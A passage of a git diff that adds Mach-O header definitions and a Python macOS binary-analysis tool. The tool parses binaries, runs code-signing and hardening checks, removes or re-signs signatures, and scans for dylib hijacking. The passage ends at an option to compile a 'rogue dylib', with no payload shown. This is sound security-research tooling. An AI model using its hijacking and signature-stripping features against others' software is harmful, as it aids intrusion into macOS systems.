the command is padded out with zero bytes to a multiple of 4 bytes/ + * (THIS IS OBSOLETE and no longer supported). 
+ */ +struct ident_command { + uint32_t cmd; /* LC_IDENT */ + uint32_t cmdsize; /* strings that follow this command */ +}; + +/* + * The fvmfile_command contains a reference to a file to be loaded at the + * specified virtual address. (Presently, this command is reserved for + * internal use. The kernel ignores this command when loading a program into + * memory). + */ +struct fvmfile_command { + uint32_t cmd; /* LC_FVMFILE */ + uint32_t cmdsize; /* includes pathname string */ + union lc_str name; /* files pathname */ + uint32_t header_addr; /* files virtual address */ +}; + + +/* + * The entry_point_command is a replacement for thread_command. + * It is used for main executables to specify the location (file offset) + * of main(). If -stack_size was used at link time, the stacksize + * field will contain the stack size need for the main thread. + */ +struct entry_point_command { + uint32_t cmd; /* LC_MAIN only used in MH_EXECUTE filetypes */ + uint32_t cmdsize; /* 24 */ + uint64_t entryoff; /* file (__TEXT) offset of main() */ + uint64_t stacksize;/* if not zero, initial stack size */ +}; + + +/* + * The source_version_command is an optional load command containing + * the version of the sources used to build the binary. + */ +struct source_version_command { + uint32_t cmd; /* LC_SOURCE_VERSION */ + uint32_t cmdsize; /* 16 */ + uint64_t version; /* A.B.C.D.E packed as a24.b10.c10.d10.e10 */ +}; + + +/* + * The LC_DATA_IN_CODE load commands uses a linkedit_data_command + * to point to an array of data_in_code_entry entries. Each entry + * describes a range of data in a code section. 
+ */ +struct data_in_code_entry { + uint32_t offset; /* from mach_header to start of data range*/ + uint16_t length; /* number of bytes in data range */ + uint16_t kind; /* a DICE_KIND_* value */ +}; +#define DICE_KIND_DATA 0x0001 +#define DICE_KIND_JUMP_TABLE8 0x0002 +#define DICE_KIND_JUMP_TABLE16 0x0003 +#define DICE_KIND_JUMP_TABLE32 0x0004 +#define DICE_KIND_ABS_JUMP_TABLE32 0x0005 + + + +/* + * Sections of type S_THREAD_LOCAL_VARIABLES contain an array + * of tlv_descriptor structures. + */ +struct tlv_descriptor +{ + void* (*thunk)(struct tlv_descriptor*); + unsigned long key; + unsigned long offset; +}; + +/* + * LC_NOTE commands describe a region of arbitrary data included in a Mach-O + * file. Its initial use is to record extra data in MH_CORE files. + */ +struct note_command { + uint32_t cmd; /* LC_NOTE */ + uint32_t cmdsize; /* sizeof(struct note_command) */ + char data_owner[16]; /* owner name for this LC_NOTE */ + uint64_t offset; /* file offset of this data */ + uint64_t size; /* length of data region */ +}; + +#endif /* _MACHO_LOADER_H_ */ \ No newline at end of file diff --git a/IV. Dylibs/python/CrimsonUroboros.py b/IV. Dylibs/python/CrimsonUroboros.py new file mode 100755 index 0000000..c70f4a0 --- /dev/null +++ b/IV. Dylibs/python/CrimsonUroboros.py @@ -0,0 +1,1304 @@ +#!/usr/bin/env python3 +import lief +import uuid +import argparse +import subprocess +import os +import sys +import mmap +import plistlib +import json +import sys +import treelib + +'''*** REMAINDER *** +Change initialization in MachOProcessoer -> process -> try block. +Always initialize the latest Snake class: + +snake_instance = SnakeII(binaries) +''' +### --- I. 
### --- I. MACH-O --- ###
class MachOProcessor:
    '''Drives the SnakeI: Mach-O command-line options (code split out of main()).'''

    def __init__(self, file_path):
        '''Store the absolute path of the binary to analyze.'''
        self.file_path = os.path.abspath(file_path)

    def parseFatBinary(self):
        '''Parse the file with LIEF; returns a FatBinary, or None when the file is not a Mach-O.'''
        return lief.MachO.parse(self.file_path)

    def process(self):
        '''Executes the code for the SnakeI: Mach-O options.'''
        if not os.path.exists(self.file_path):  # Check if file_path specified in the --path argument exists.
            print(f'The file {self.file_path} does not exist.')
            exit()

        try:  # Check if the file has a valid Mach-O format
            # Must be global: snake_instance keeps references into "binaries" after
            # this processor object is destroyed ("binary" depends on "binaries").
            global binaries
            binaries = self.parseFatBinary()
            if binaries is None:
                exit()  # Exit if not a valid Mach-O

            global snake_instance  # Shared with the other processor classes.
            snake_instance = SnakeIV(binaries, self.file_path)  # Initialize the latest Snake class

            if args.file_type:  # Print binary file type
                print(f'File type: {snake_instance.getFileType()}')
            if args.header_flags:  # Print binary header flags
                header_flag_list = snake_instance.getHeaderFlags()
                print("Header flags:", " ".join(hf.name for hf in header_flag_list))
            if args.endian:  # Print binary endianess
                print(f'Endianess: {snake_instance.getEndianess()}')
            if args.header:  # Print binary header
                print(snake_instance.getBinaryHeader())
            if args.load_commands:  # Print binary load commands
                load_commands_list = snake_instance.getLoadCommands()
                print("Load Commands:", " ".join(lc.command.name for lc in load_commands_list))
            if args.segments:  # Print binary segments in human friendly form
                for segment in snake_instance.getSegments():
                    print(segment)
            if args.sections:  # Print binary sections in human friendly form
                for section in snake_instance.getSections():
                    print(section)
            if args.symbols:  # Print symbols
                for symbol in snake_instance.getSymbols():
                    print(symbol.name)
            if args.chained_fixups:  # Print Chained Fixups information
                print(snake_instance.getChainedFixups())
            if args.exports_trie:  # Print Exports Trie information
                print(snake_instance.getExportTrie())
            if args.uuid:  # Print UUID
                print(f'UUID: {snake_instance.getUUID()}')
            if args.main:  # Print entry point and stack size
                print(f'Entry point: {hex(snake_instance.getMain().entrypoint)}')
                print(f'Stack size: {hex(snake_instance.getMain().stack_size)}')
            if args.encryption_info is not None:  # Print encryption info and save encrypted data if path is specified
                if snake_instance.binary.has_encryption_info:
                    crypt_id, crypt_offset, crypt_size = snake_instance.getEncryptionInfo()
                    print(f"cryptid: {crypt_id}")
                    print(f"cryptoffset: {hex(crypt_offset)}")
                    print(f"cryptsize: {hex(crypt_size)}")
                    save_path = args.encryption_info
                    if save_path and save_path.strip():
                        snake_instance.saveEcryptedData(save_path.strip())
                else:
                    # FIX: previously referenced the module-level file_path instead of self.file_path.
                    print(f"{os.path.basename(self.file_path)} binary does not have encryption info.")
            if args.strings_section:  # Print strings from __cstring section
                print('Strings from __cstring section:')
                print('-------------------------------')
                for string in snake_instance.getStringSection():
                    print(string)
            if args.all_strings:  # Print strings from all sections.
                print(snake_instance.findAllStringsInBinary())
            if args.save_strings:  # Parse all sections, detect strings and save them to a file
                # FIX: the old code iterated the returned string character-by-character;
                # write the whole (already newline-separated) result at once.
                with open(args.save_strings, 'a') as f:
                    f.write(snake_instance.findAllStringsInBinary())
            if args.info:  # Print all info about the binary
                print('\n<=== HEADER ===>')
                print(snake_instance.getBinaryHeader())
                print('\n<=== LOAD COMMANDS ===>')
                for lcd in snake_instance.getLoadCommands():
                    print(lcd)
                    print("=" * 50)
                print('\n<=== SEGMENTS ===>')
                for segment in snake_instance.getSegments():
                    print(segment)
                print('\n<=== SECTIONS ===>')
                for section in snake_instance.getSections():
                    print(section)
                print('\n<=== SYMBOLS ===>')
                for symbol in snake_instance.getSymbols():
                    print(symbol.name)
                print('\n<=== STRINGS ===>')
                print('Strings from __cstring section:')
                print('-------------------------------')
                for string in snake_instance.getStringSection():
                    print(string)
                if snake_instance.binary.has_encryption_info:
                    print('\n<=== ENCRYPTION INFO ===>')
                    crypt_id, crypt_offset, crypt_size = snake_instance.getEncryptionInfo()
                    print(f"cryptid: {crypt_id}")
                    print(f"cryptoffset: {hex(crypt_offset)}")
                    print(f"cryptsize: {hex(crypt_size)}")
                print('\n<=== UUID ===>')
                print(f'{snake_instance.getUUID()}')
                print('\n<=== ENDIANESS ===>')
                print(snake_instance.getEndianess())
                print('\n<=== ENTRYPOINT ===>')
                print(f'{hex(snake_instance.getMain().entrypoint)}')
        except Exception as e:  # Handling any unexpected errors
            print(f"An error occurred during SnakeI: Mach-O processing: {e}")
            exit()


class SnakeI:
    '''Base class: Mach-O parsing and generic binary information.'''

    def __init__(self, binaries, file_path):
        '''When initiated, the program parses a Universal binary (binaries parameter) and extracts the ARM64 Mach-O.
        If the file is not in a universal format but is a valid ARM64 Mach-O, it is taken as the binary during initialization.'''
        self.binary = self.parseFatBinary(binaries)
        self.file_path = file_path
        self.load_commands = self.getLoadCommands()
        self.endianess = self.getEndianess()
        # Offset of the ARM64 slice inside a Universal Binary; used in file-offset calculations.
        self.fat_offset = self.binary.fat_offset
        # vm_prot_t bitmask (r=1, w=2, x=4) to rwx string.
        self.prot_map = {
            0: '---',
            1: 'r--',
            2: '-w-',
            3: 'rw-',
            4: '--x',
            5: 'r-x',
            6: '-wx',
            7: 'rwx'
        }
        # Segment command flag bits to their Mach-O names.
        self.segment_flags_map = {
            0x1: 'SG_HIGHVM',
            0x2: 'SG_FVMLIB',
            0x4: 'SG_NORELOC',
            0x8: 'SG_PROTECTED_VERSION_1',
            0x10: 'SG_READ_ONLY',
        }

    def mapProtection(self, numeric_protection):
        '''Maps numeric protection to its string representation.'''
        return self.prot_map.get(numeric_protection, 'Unknown')

    def getSegmentFlags(self, flags):
        '''Maps numeric segment flags to its string representation ('' when unknown/none).'''
        return self.segment_flags_map.get(flags, '')

    def parseFatBinary(self, binaries):
        '''Parse Mach-O file, whether compiled for multiple architectures or just for a single one.
        Returns the ARM64 binary if it exists; otherwise exits the program.'''
        arm64_bin = None  # FIX: was referenced before assignment when no ARM64 slice exists.
        for binary in binaries:
            if binary.header.cpu_type == lief.MachO.CPU_TYPES.ARM64:
                arm64_bin = binary
        if arm64_bin is None:
            print('The specified Mach-O file is not in ARM64 architecture.')
            exit()
        return arm64_bin

    def getFileType(self):
        '''Extract and return the file type from a binary object's header.'''
        return self.binary.header.file_type.name

    def getHeaderFlags(self):
        '''Return binary header flags.'''
        return self.binary.header.flags_list

    def getEndianess(self):
        '''Check the endianness of a binary based on the system and the binary's magic number.'''
        magic = self.binary.header.magic.name
        endianness = sys.byteorder
        if endianness == 'little' and magic in ('MAGIC_64', 'MAGIC', 'FAT_MAGIC'):
            return 'little'
        return 'big'

    def getBinaryHeader(self):
        '''https://lief-project.github.io/doc/stable/api/python/macho.html#header'''
        return self.binary.header

    def getLoadCommands(self):
        '''https://lief-project.github.io/doc/stable/api/python/macho.html#loadcommand'''
        return self.binary.commands

    def getSegments(self):
        '''Extract segments from the binary and return human readable strings:
        https://lief-project.github.io/doc/stable/api/python/macho.html#lief.MachO.SegmentCommand'''
        segment_info = []
        for segment in self.binary.segments:
            name = segment.name
            va_start = '0x' + format(segment.virtual_address, '016x')
            va_end = '0x' + format(int(va_start, 16) + segment.virtual_size, '016x')
            # FIX: the file range start used segment.file_size; it must be the segment's
            # file offset (plus the fat slice offset).
            file_start = hex(segment.file_offset + self.fat_offset)
            file_end = hex(int(file_start, 16) + segment.file_size)
            init_prot = self.mapProtection(segment.init_protection)
            max_prot = self.mapProtection(segment.max_protection)
            flags = self.getSegmentFlags(segment.flags)
            line = f'{name.ljust(16)}{init_prot}/{max_prot.ljust(8)} VM: {va_start}-{va_end.ljust(24)} FILE: {file_start}-{file_end}'
            if flags != '':
                line += f' ({flags})'
            segment_info.append(line)
        return segment_info

    def getSections(self):
        '''Extract sections from the binary and return them in human readable format:
        https://lief-project.github.io/doc/stable/api/python/macho.html#lief.MachO.Section'''
        sections_info = []
        sections_info.append("SEGMENT".ljust(14) + "SECTION".ljust(20) + "TYPE".ljust(28) + "VIRTUAL MEMORY".ljust(32) + "FILE".ljust(26) + "FLAGS".ljust(40))
        sections_info.append(len(sections_info[0]) * "=")
        for section in self.binary.sections:
            segment_name = section.segment_name
            section_name = section.fullname
            section_type = section.type.name
            section_va_start = hex(section.virtual_address)
            # FIX: the VM end address was computed as virtual_address + file offset;
            # the end of the section in memory is virtual_address + size.
            section_va_end = hex(section.virtual_address + section.size)
            section_size_start = hex(section.offset + self.fat_offset)
            section_size_end = hex(section.size + section.offset + self.fat_offset)
            flags = " ".join(flag.name for flag in section.flags_list)
            sections_info.append(f'{segment_name.ljust(14)}{section_name.ljust(20)}{section_type.ljust(28)}{section_va_start}-{section_va_end.ljust(20)}{section_size_start}-{section_size_end}\t\t({flags})')
        return sections_info

    def getSymbols(self):
        '''Get all symbols from the binary (LC_SYMTAB, Chained Fixups, Exports Trie):
        https://lief-project.github.io/doc/stable/api/python/macho.html#symbol'''
        return self.binary.symbols

    def getChainedFixups(self):
        '''Return Chained Fixups information: https://lief-project.github.io/doc/latest/api/python/macho.html#chained-binding-info'''
        return self.binary.dyld_chained_fixups

    def getExportTrie(self):
        '''Return Export Trie information: https://lief-project.github.io/doc/latest/api/python/macho.html#dyldexportstrie-command'''
        try:
            return self.binary.dyld_exports_trie.show_export_trie()
        except Exception:
            return "NO EXPORT TRIE"

    def getUUID(self):
        '''Return the LC_UUID value as a canonical UUID string, or None if the command is absent:
        https://lief-project.github.io/doc/stable/api/python/macho.html#uuidcommand'''
        for cmd in self.binary.commands:
            if isinstance(cmd, lief.MachO.UUIDCommand):
                return str(uuid.UUID(bytes=bytes(cmd.uuid)))
        return None  # FIX: previously raised NameError when LC_UUID was missing.

    def getMain(self):
        '''Determine the entry point of an executable (LC_MAIN).'''
        return self.binary.main_command

    def getStringSection(self):
        '''Return decoded strings from the __cstring (string table) sections.'''
        extracted_strings = set()
        for section in self.binary.sections:
            if section.type == lief.MachO.SECTION_TYPES.CSTRING_LITERALS:
                # Decode each NUL-separated chunk; skip empties and non-UTF-8 garbage.
                for raw in section.content.tobytes().split(b'\x00'):
                    if raw:
                        try:
                            extracted_strings.add(raw.decode('utf-8'))
                        except UnicodeDecodeError:
                            pass
        return extracted_strings

    def findAllStringsInBinary(self):
        '''Check every binary section to find printable UTF-8 strings; returns one newline-joined string.'''
        extracted_strings = ""
        byte_set = set()
        for section in self.binary.sections:
            byte_set.update(section.content.tobytes().split(b'\x00'))
        for byte_item in sorted(byte_set):  # sorted for deterministic output
            try:
                extracted_strings += byte_item.decode('utf-8') + "\n"
            except UnicodeDecodeError:
                pass
        return extracted_strings

    def getEncryptionInfo(self):
        '''Return (crypt_id, crypt_offset, crypt_size) from LC_ENCRYPTION_INFO(_64), or None if absent.'''
        if self.binary.has_encryption_info:
            info = self.binary.encryption_info
            return info.crypt_id, info.crypt_offset, info.crypt_size
        return None

    def extractBytesAtOffset(self, offset, size):
        '''Extract bytes at a given offset and of a specified size in the binary file
        (takes the Fat Binary slide into account).'''
        # FIX: previously used the module-level file_path instead of self.file_path.
        offset += self.fat_offset  # ARM64 slice usually sits after the x86_64 slice in a Fat Binary.
        file_size = os.path.getsize(self.file_path)
        if offset + size > file_size:
            raise ValueError("Offset and size exceed the binary file's length.")
        with open(self.file_path, "rb") as file:
            file.seek(offset)
            return file.read(size)

    def saveEcryptedData(self, output_path):
        '''Dump the encrypted region described by LC_ENCRYPTION_INFO to output_path.
        NOTE: method name typo ("Ecrypted") kept for backward compatibility; relies on
        saveBytesToFile(), which is defined in SnakeII (instances are always SnakeIV).'''
        _, cryptoff, cryptsize = self.getEncryptionInfo()
        self.saveBytesToFile(self.extractBytesAtOffset(cryptoff, cryptsize), output_path)


### --- II. CODE SIGNING --- ###
class CodeSigningProcessor:
    '''Drives the SnakeII: Code Signing command-line options (code split out of main()).'''

    def __init__(self):
        pass

    def process(self):
        '''Executes the code for the SnakeII: Code Signing options.'''
        try:
            if args.verify_signature:  # Verify if Code Signature matches the binary content
                if snake_instance.isSigValid(file_path):
                    print("Valid Code Signature (matches the content)")
                else:
                    print("Invalid Code Signature (does not match the content)")
            if args.cd_info:  # Print Code Signature information
                print(snake_instance.getCodeSignature(file_path).decode('utf-8'))
            if args.cd_requirements:  # Print Requirements.
                print(snake_instance.getCodeSignatureRequirements(file_path).decode('utf-8'))
            if args.entitlements:  # Print Entitlements.
                print(snake_instance.getEntitlementsFromCodeSignature(file_path, args.entitlements))
            if args.extract_cms:  # Extract the CMS Signature and save it to a given file.
                cms_signature = snake_instance.extractCMS()
                snake_instance.saveBytesToFile(cms_signature, args.extract_cms)
            if args.extract_certificates:  # Extract Certificates and save them to a given file.
                snake_instance.extractCertificatesFromCodeSignature(args.extract_certificates)
            if args.remove_sig:  # Save a new file on disk with the signature removed.
                snake_instance.removeCodeSignature(args.remove_sig)
            if args.sign_binary:  # Sign the given binary using the specified identity.
                snake_instance.signBinary(args.sign_binary)
        except Exception as e:
            print(f"An error occurred during SnakeII: Code Signing processing: {e}")


class SnakeII(SnakeI):
    '''Code Signing inspection helpers (wraps the codesign(1) tool and LIEF).'''

    def __init__(self, binaries, file_path):
        super().__init__(binaries, file_path)
        # CMS Signature Blob magic; the Code Signature is in network byte order (big endian).
        self.magic_bytes = (0xFADE0B01).to_bytes(4, byteorder='big')

    def isSigValid(self, file_path):
        '''Checks if the Code Signature is valid (i.e. the binary contents have not been modified).'''
        result = subprocess.run(["codesign", "-v", file_path], capture_output=True)
        return result.stderr == b''

    def getCodeSignature(self, file_path):
        '''Returns information about the Code Signature (codesign writes it to stderr).'''
        result = subprocess.run(["codesign", "-d", "-vvvvvv", file_path], capture_output=True)
        return result.stderr

    def getCodeSignatureRequirements(self, file_path):
        '''Returns information about the Code Signature Requirements.'''
        result = subprocess.run(["codesign", "-d", "-r", "-", file_path], capture_output=True)
        return result.stdout

    def getEntitlementsFromCodeSignature(self, file_path, format=None):
        '''Returns the Code Signature Entitlements in 'human' (default), 'xml' or 'der' format.'''
        if format == 'human' or format is None:
            result = subprocess.run(["codesign", "-d", "--entitlements", "-", file_path], capture_output=True)
            return result.stdout.decode('utf-8')
        elif format == 'xml':
            result = subprocess.run(["codesign", "-d", "--entitlements", "-", "--xml", file_path], capture_output=True)
        elif format == 'der':
            result = subprocess.run(["codesign", "-d", "--entitlements", "-", "--der", file_path], capture_output=True)
        else:
            # FIX: previously fell through to an unbound 'result' (NameError).
            raise ValueError(f"Unsupported entitlements format: {format}")
        return result.stdout

    def extractCMS(self):
        '''Find the CMS blob magic in the Code Signature and return the CMS signature bytes.'''
        cs = self.binary.code_signature
        cs_content = bytes(cs.content)
        offset = cs_content.find(self.magic_bytes)
        cms_len_in_int = int.from_bytes(cs_content[offset + 4:offset + 8], byteorder='big')
        return cs_content[offset + 8:offset + 8 + cms_len_in_int]

    def saveBytesToFile(self, data, filename):
        '''Save bytes to a file.'''
        with open(filename, 'wb') as file:
            file.write(data)

    def extractCertificatesFromCodeSignature(self, cert_name):
        '''Extracts certificates from the CMS Signature, saved with _0, _1, _2 suffixes.'''
        # FIX: previously used the module-level file_path instead of self.file_path.
        subprocess.run(["codesign", "-d", f"--extract-certificates={cert_name}_", self.file_path], capture_output=True)

    def removeCodeSignature(self, new_name):
        '''Save a new file on disk with the signature removed.'''
        self.binary.remove_signature()
        self.binary.write(new_name)

    def signBinary(self, security_identity=None):
        '''Sign the binary using a pseudo identity (adhoc) or the specified identity.'''
        # FIX: previously used the module-level file_path instead of self.file_path.
        if security_identity == 'adhoc' or security_identity is None:
            result = subprocess.run(["codesign", "-s", "-", "-f", self.file_path], capture_output=True)
            return result.stdout.decode('utf-8')
        try:
            subprocess.run(["codesign", "-s", security_identity, "-f", self.file_path], capture_output=True)
        except Exception as e:
            print(f"An error occurred during Code Signing using {security_identity}\n {e}")
### --- III. CHECKSEC --- ###
class ChecksecProcessor:
    '''Drives the SnakeIII: Checksec command-line options (code split out of main()).'''

    def __init__(self):
        pass

    def process(self):
        '''Executes the code for the SnakeIII: Checksec options.'''
        try:
            if args.has_pie:  # Check if PIE is set in the header flags
                print("PIE: " + str(snake_instance.hasPIE()))
            if args.has_arc:  # Check if ARC is in use
                print("ARC: " + str(snake_instance.hasARC()))
            if args.is_stripped:  # Check if binary is stripped
                print("STRIPPED: " + str(snake_instance.isStripped()))
            if args.has_canary:  # Check if binary has stack canary
                print("CANARY: " + str(snake_instance.hasCanary()))
            if args.has_nx_stack:  # Check if binary has non executable stack
                print("NX STACK: " + str(snake_instance.hasNXstack()))
            if args.has_nx_heap:  # Check if binary has non executable heap
                print("NX HEAP: " + str(snake_instance.hasNXheap()))
            if args.has_xn:  # Check if binary is protected by eXecute Never functionality
                print(f"eXecute Never: {str(snake_instance.hasXN())}")
            if args.is_notarized:  # Check if the application is notarized and can pass Gatekeeper verification
                print("NOTARIZED: " + str(snake_instance.isNotarized(file_path)))
            if args.is_encrypted:  # Check if the application has encrypted data
                print("ENCRYPTED: " + str(snake_instance.isEncrypted()))
            if args.has_restrict:  # Check if the binary contains a __RESTRICT segment (FIX: comment was a copy-paste of is_encrypted)
                print("RESTRICTED: " + str(snake_instance.hasRestrictSegment()))
            if args.is_hr:  # Check if Hardened Runtime is in use
                print("HARDENED: " + str(snake_instance.hasHardenedRuntimeFlag(file_path)))
            if args.is_as:  # Check if App Sandbox is in use
                print("APP SANDBOX: " + str(snake_instance.hasAppSandbox(file_path)))
            if args.is_fort:  # Check if binary is fortified
                fortified_symbols = snake_instance.getForifiedSymbols()
                print("FORTIFIED: " + str(snake_instance.isFortified(fortified_symbols)))
            if args.has_rpath:  # Check if binary has @rpaths
                print("RPATH: " + str(snake_instance.hasRpath()))
            if args.checksec:  # Run all checks from above and present them in a table
                print("<==== CHECKSEC ======")
                print("PIE: ".ljust(16) + str(snake_instance.hasPIE()))
                print("ARC: ".ljust(16) + str(snake_instance.hasARC()))
                print("STRIPPED: ".ljust(16) + str(snake_instance.isStripped()))
                print("CANARY: ".ljust(16) + str(snake_instance.hasCanary()))
                print("NX STACK: ".ljust(16) + str(snake_instance.hasNXstack()))
                print("NX HEAP: ".ljust(16) + str(snake_instance.hasNXheap()))
                print("XN:".ljust(16) + str(snake_instance.hasXN()))
                print("NOTARIZED: ".ljust(16) + str(snake_instance.isNotarized(file_path)))
                print("ENCRYPTED: ".ljust(16) + str(snake_instance.isEncrypted()))
                print("RESTRICTED: ".ljust(16) + str(snake_instance.hasRestrictSegment()))
                print("HARDENED: ".ljust(16) + str(snake_instance.hasHardenedRuntimeFlag(file_path)))
                print("APP SANDBOX: ".ljust(16) + str(snake_instance.hasAppSandbox(file_path)))
                fortified_symbols = snake_instance.getForifiedSymbols()
                print("FORTIFIED: ".ljust(16) + str(snake_instance.isFortified(fortified_symbols)))
                print("RPATH: ".ljust(16) + str(snake_instance.hasRpath()))
                print("=====================>")
        except Exception as e:
            print(f"An error occurred during SnakeIII: Checksec processing: {e}")


class SnakeIII(SnakeII):
    '''Security-hardening (checksec-style) inspection of a Mach-O binary.'''

    def __init__(self, binaries, file_path):
        super().__init__(binaries, file_path)

    def hasPIE(self):
        '''Check if MH_PIE (0x00200000) is set in the header flags.'''
        return self.binary.is_pie

    def hasARC(self):
        '''Check if the _objc_release symbol is imported (Automatic Reference Counting in use).'''
        for symbol in self.binary.symbols:
            if symbol.name.lower().strip() == '_objc_release':
                return True
        return False

    def isStripped(self):
        '''Check if the binary is stripped: True when no local/debug symbols remain
        (apart from the two well-known compiler-emitted names).'''
        filter_symbols = ['radr://5614542', '__mh_execute_header']
        for symbol in self.binary.symbols:
            symbol_type = symbol.type
            symbol_name = symbol.name.lower().strip()
            # Stab/debug (N_STAB mask 0xe0) or local symbol types indicate an unstripped binary.
            is_symbol_stripped = (symbol_type & 0xe0 > 0) or (symbol_type in [0x0e, 0x1e, 0x0f])
            if is_symbol_stripped and symbol_name not in filter_symbols:
                return False
        return True

    def hasCanary(self):
        '''Check whether the binary references ___stack_chk_fail / ___stack_chk_guard.'''
        canary_symbols = ['___stack_chk_fail', '___stack_chk_guard']
        for symbol in self.binary.symbols:
            if symbol.name.lower().strip() in canary_symbols:
                return True
        return False

    def hasNXstack(self):
        '''Check if MH_ALLOW_STACK_EXECUTION (0x00020000) is NOT set in the header flags.'''
        return not bool(self.binary.header.flags & lief.MachO.HEADER_FLAGS.ALLOW_STACK_EXECUTION.value)

    def hasNXheap(self):
        '''Check if MH_NO_HEAP_EXECUTION (0x01000000) is set in the header flags.'''
        return bool(self.binary.header.flags & lief.MachO.HEADER_FLAGS.NO_HEAP_EXECUTION.value)

    @staticmethod
    def isXNos():
        '''Check if the OS is running on the ARM architecture.
        FIX: was missing self/@staticmethod, so instance calls raised TypeError.'''
        system_info = os.uname()
        return "arm" in system_info.machine.lower()

    @staticmethod
    def checkXNmap():
        '''If XN is ON, a W&X memory page cannot be mapped; probe by trying to create one.
        FIX: was missing self/@staticmethod, so instance calls raised TypeError.'''
        try:
            mmap.mmap(-1, 4096, prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC)
        except mmap.error:
            return True  # W&X mapping refused - eXecute Never is enforced.
        return False

    def convertXMLEntitlementsToDict(self, entitlements_xml):
        '''Convert XML entitlements (from getEntitlementsFromCodeSignature) to a dictionary.'''
        return plistlib.loads(entitlements_xml)

    def convertDictEntitlementsToJson(self, entitlements_dict):
        '''Convert an entitlements dictionary to JSON with indent 4.'''
        return json.dumps(entitlements_dict, indent=4)

    def checkIfEntitlementIsUsed(self, entitlement_name, entitlement_value, file_path):
        '''Check if the given entitlement exists and has the specified value (case-insensitive).'''
        try:
            entitlements_xml = self.getEntitlementsFromCodeSignature(file_path, 'xml')
            if entitlements_xml == b'':  # No entitlements at all
                return False
            entitlements_dict = self.convertXMLEntitlementsToDict(entitlements_xml)
            parsed_data = {key.lower(): value for key, value in entitlements_dict.items()}
            entitlement_name_lower = entitlement_name.lower()
            entitlement_value_lower = str(entitlement_value).lower()
            return (entitlement_name_lower in parsed_data
                    and str(parsed_data[entitlement_name_lower]).lower() == entitlement_value_lower)
        except Exception as e:
            # FIX: previously caught json.JSONDecodeError, but the parser is plistlib,
            # so its errors (and subprocess errors) escaped unhandled.
            print(f"Error in checkIfEntitlementIsUsed: {e}")
            return False

    def hasAllowJITentitlement(self, file_path):
        '''True when the binary has the com.apple.security.cs.allow-jit entitlement
        (allows creating W&X memory with the MAP_JIT flag).'''
        if self.checkIfEntitlementIsUsed('com.apple.security.cs.allow-jit', 'true', file_path):
            print(f"[INFO -> XN]: {os.path.basename(file_path)} contains allow-jit entitlement.")
            return True
        return False

    def checkIfCompiledForOtherThanARM(self):
        '''Iterate over the FatBinary and check if there are architectures other than ARM/ARM64.'''
        XN_types = [lief.MachO.CPU_TYPES.ARM64, lief.MachO.CPU_TYPES.ARM]
        for binary in binaries:
            if binary.header.cpu_type not in XN_types:
                # FIX: previously used the module-level file_path instead of self.file_path.
                print(f"[INFO -> XN]: {os.path.basename(self.file_path)} is compiled for other CPUs than ARM or ARM64.")
                return True
        return False

    def hasXN(self):
        '''True unless the binary allows W&X via allow-jit or is compiled for CPUs
        that do not support ARM's eXecute Never feature.'''
        if self.hasAllowJITentitlement(self.file_path) or self.checkIfCompiledForOtherThanARM():
            return False
        return True

    def isNotarized(self, file_path):
        '''Verify if the application is notarized and passes Gatekeeper verification (spctl).'''
        result = subprocess.run(["spctl", "-a", file_path], capture_output=True)
        return result.stderr == b''

    def isEncrypted(self):
        '''If cryptid is non-zero, some parts of the binary are encrypted.'''
        if self.binary.has_encryption_info:
            # FIX: checked == 1 while the contract is "non-zero".
            if self.binary.encryption_info.crypt_id != 0:
                return True
        return False

    def hasRestrictSegment(self):
        '''Check if the binary contains a __RESTRICT segment.'''
        for segment in self.binary.segments:
            if segment.name.lower().strip() == "__restrict":
                return True
        return False

    def hasHardenedRuntimeFlag(self, file_path):
        '''Check if the Hardened Runtime flag is set for the given binary.'''
        return b'runtime' in self.getCodeSignature(file_path)

    def hasAppSandbox(self, file_path):
        '''Check if App Sandbox is in use (com.apple.security.app-sandbox entitlement set).'''
        return self.checkIfEntitlementIsUsed('com.apple.security.app-sandbox', 'true', file_path)

    def getForifiedSymbols(self):
        '''Return symbol names containing the _chk suffix, excluding stack-canary symbols.
        NOTE: method name typo ("Forified") kept for backward compatibility.'''
        symbol_filter = ['___stack_chk_fail', '___stack_chk_guard']
        fortified_symbols = []
        for symbol in self.binary.symbols:
            symbol_name = symbol.name.lower().strip()
            if ('_chk' in symbol_name) and (symbol_name not in symbol_filter):
                fortified_symbols.append(symbol_name)
        return fortified_symbols

    def isFortified(self, fortified_symbols):
        '''True when the given fortified_symbols list is non-empty.'''
        return len(fortified_symbols) > 0

    def hasRpath(self):
        '''True when the binary contains at least one LC_RPATH command.'''
        return self.binary.has_rpath
### --- IV. DYLIBS --- ###
class DylibsProcessor:
    '''Drives the SnakeIV: Dylibs command-line options (code split out of main()).'''

    def __init__(self):
        pass

    def process(self):
        '''Executes the code for the SnakeIV: Dylibs options against the global snake_instance.'''
        try:  # FIX: the try/except present in every sibling processor was commented out here.
            if args.dylibs:  # Shared dylibs with unresolved paths
                snake_instance.printDylibs()
            if args.rpaths:  # All resolved paths from LC_RPATHs
                snake_instance.printRpathsResolved()
            if args.rpaths_u:  # All unresolved paths from LC_RPATHs
                snake_instance.printRpathsUnresolved()
            if args.dylibs_paths:  # Resolved dylib loading paths in the order they are searched
                snake_instance.printResolvedDylibPaths()
            if args.dylibs_paths_u:  # Unresolved dylib loading paths (like --dylibs, without version info)
                snake_instance.printUnresolvedDylibPaths()
            if args.broken_relative_paths:  # Relative paths not using @executable_path/@loader_path/@rpath
                snake_instance.printBrokenRelativePaths()
            if args.dylibtree:  # Dylibtree: "<dsc_path>,<output_path>,<is_extracted>"
                parts = args.dylibtree.split(',')
                # FIX: previously IndexError'ed when fewer than 3 comma-separated
                # fields were given; pad with defaults ('' paths, '0' = not extracted).
                while len(parts) < 3:
                    parts.append('0' if len(parts) == 2 else '')
                dylibtree = snake_instance.getDylibTree(parts[0], parts[1], parts[2])
                snake_instance.printTreeFromTreelib(dylibtree)
            if args.dylib_id:  # Path from Dylib ID Load Command
                print(snake_instance.getPathFromDylibID())
            if args.reexport_paths:  # All reexported libraries paths
                print(*snake_instance.getReExportPaths(), sep="\n")
            if args.hijack_sec:  # Check Dylib Hijacking protection on binary
                print("DYLIB HIJACKIG PROTECTION: " + str(snake_instance.checkDylibHijackingProtections(file_path)))
            if args.dylib_hijacking:  # Direct & Indirect Dylib Hijacking check
                if args.dylib_hijacking == 'default':
                    args.dylib_hijacking = None
                all_results = snake_instance.dylibHijackingScanner(args.dylib_hijacking)
                snake_instance.parseDylibHijackingScannerResults(all_results)
            if args.prepare_dylib:  # Compile rogue dylib
                if args.prepare_dylib == 'default':
